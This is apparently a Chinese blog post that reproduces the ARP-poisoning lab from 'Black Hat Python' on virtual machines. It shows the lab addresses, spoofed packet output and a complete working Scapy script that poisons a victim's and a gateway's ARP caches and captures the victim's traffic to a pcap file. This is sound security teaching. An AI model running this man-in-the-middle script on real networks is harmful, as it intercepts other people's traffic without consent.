近期收到了電子工業出版社贈送的一本網絡安全書籍《python黑帽子》,書中一共24個實驗,今天複現第9個實驗(arp投毒),我的測試環境是mbp電腦+kali虛拟機+centos虛拟機+conda開發環境。涉及到受害者 centos、攻擊者 kali、觀察者 mbp、網關,攻擊者作為網關和受害者之間的中間人,既要欺騙受害者,說自己是網關,又要欺騙網關,說自己是受害者~
ailx10
網絡安全優秀回答者
網絡安全碩士
去咨詢
1、檢查我們原始的網關、受害者資訊、攻擊者資訊、觀察者資訊
- 受害者 centos :192.168.0.105 (8:0:27:f9:f4:e)
- 攻擊者 kali :192.168.0.103 (8:0:27:e7:67:1c)
- 觀察者 mbp :192.168.0.101 (18:65:90:cb:f0:5d)
- 網關:192.168.0.1 (94:d9:b3:66:ef:5c)
2、在受害者centos 上先看一下,和觀察者mbp 一樣
3、在攻擊者kali 上開啟IP轉發
echo 1 > /proc/sys/net/ipv4/ip_forward
4、在攻擊者kali 上運作腳本
欺騙受害者,說網關192.168.0.1的MAC位址在08:00:27:e7:67:1c(實際上這個MAC位址是攻擊者kali)
ip src:192.168.0.1
ip dst:192.168.0.105
mac dst:08:00:27:f9:f4:0e
mac src:08:00:27:e7:67:1c
ARP is at 08:00:27:e7:67:1c says 192.168.0.1
欺騙網關,說受害者192.168.0.105的MAC位址在08:00:27:e7:67:1c(實際上這個MAC位址是攻擊者kali)
ip src:192.168.0.105
ip dst:192.168.0.1
mac dst:94:d9:b3:66:ef:5c
mac src:08:00:27:e7:67:1c
ARP is at 08:00:27:e7:67:1c says 192.168.0.105
5、在受害者上檢視ARP表
ARP表中的網關MAC位址,已經變成了攻擊者kali 的MAC位址了。看到這,就算實驗成功了~
參考代碼:
# -*- coding: utf-8 -*-
# @Time : 2022/6/6 10:39 PM
# @Author : ailx10
# @File : arper.py
from multiprocessing import Process
from scapy.all import sniff,conf,get_if_addr,send,sndrcv,srp,wrpcap
from scapy.layers.inet import Ether
from scapy.layers.l2 import ARP
import os
import sys
import time
def get_mac(targetip):
packet = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op="who-has",pdst=targetip)
resp,_ = srp(packet,timeout=2,retry=10,verbose=False)
for _,r in resp:
return r[Ether].src
return None
class Arper:
def __init__(self,victim,gateway,interface="en0"):
self.victim = victim
self.victimmac = get_mac(victim)
self.gateway = gateway
self.gatewaymac = get_mac(gateway)
self.interface = interface
conf.iface = interface
conf.verb = 0
conf.use_pcap = True
print(f"Initialized {interface}:")
print(f"Gateway ({gateway}) is at {self.gatewaymac}")
print(f"Victim ({victim}) is at {self.victimmac}")
print("-"*30)
def run(self):
self.poison_thread = Process(target=self.poison)
self.poison_thread.start()
self.sniff_thread = Process(target=self.sniff)
self.sniff_thread.start()
def poison(self):
# 構造欺騙受害者的ARP包,源IP位址是網關,源MAC位址是黑客,目的IP位址是受害者,目的MAC位址是受害者
poison_victim = ARP()
poison_victim.op = 2
poison_victim.psrc = self.gateway
poison_victim.pdst = self.victim
poison_victim.hwdst = self.victimmac
print(f"ip src:{poison_victim.psrc}")
print(f"ip dst:{poison_victim.pdst}")
print(f"mac dst:{poison_victim.hwdst}")
print(f"mac src:{poison_victim.hwsrc}")
print(poison_victim.summary())
print("-"*30)
# 構造欺騙網關的ARP包,源IP是受害者,源MAC位址是黑客,目的IP是網關,目的MAC位址是網關
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = self.victim
poison_gateway.pdst = self.gateway
poison_gateway.hwdst = self.gatewaymac
print(f"ip src:{poison_gateway.psrc}")
print(f"ip dst:{poison_gateway.pdst}")
print(f"mac dst:{poison_gateway.hwdst}")
print(f"mac src:{poison_gateway.hwsrc}")
print(poison_gateway.summary())
print("-"*30)
print(f"Beginning the ARP poison.[CTRL-C to stop]")
while True:
sys.stdout.write(".")
sys.stdout.flush()
try:
send(poison_victim)
send(poison_gateway)
except KeyboardInterrupt:
self.restore()
sys.exit()
else:
time.sleep(1)
def sniff(self,count=50):
time.sleep(5)
print(f"Sniffing {count} packets")
bpf_filter = "ip host %s"%self.victim
packets = sniff(count=count,filter=bpf_filter,iface=self.interface)
wrpcap("arper.pcap",packets)
print("Got the packets")
self.restore()
self.poison_thread.terminate()
print("Finished.")
def restore(self):
print("Restoring ARP tables...")
send(ARP(op=2,psrc=self.gateway,hwsrc=self.gatewaymac,pdst=self.victim,hwdst="ff:ff:ff:ff:ff:ff"),count=15)
send(ARP(op=2,psrc=self.victim,hwsrc=self.victimmac,pdst=self.gateway,hwdst="ff:ff:ff:ff:ff:ff"),count=15)
if __name__ == "__main__":
(victim,gateway,interface) = (sys.argv[1],sys.argv[2],sys.argv[3])
myarp = Arper(victim,gateway,interface)
myarp.run()
釋出于 2022-06-07 06:51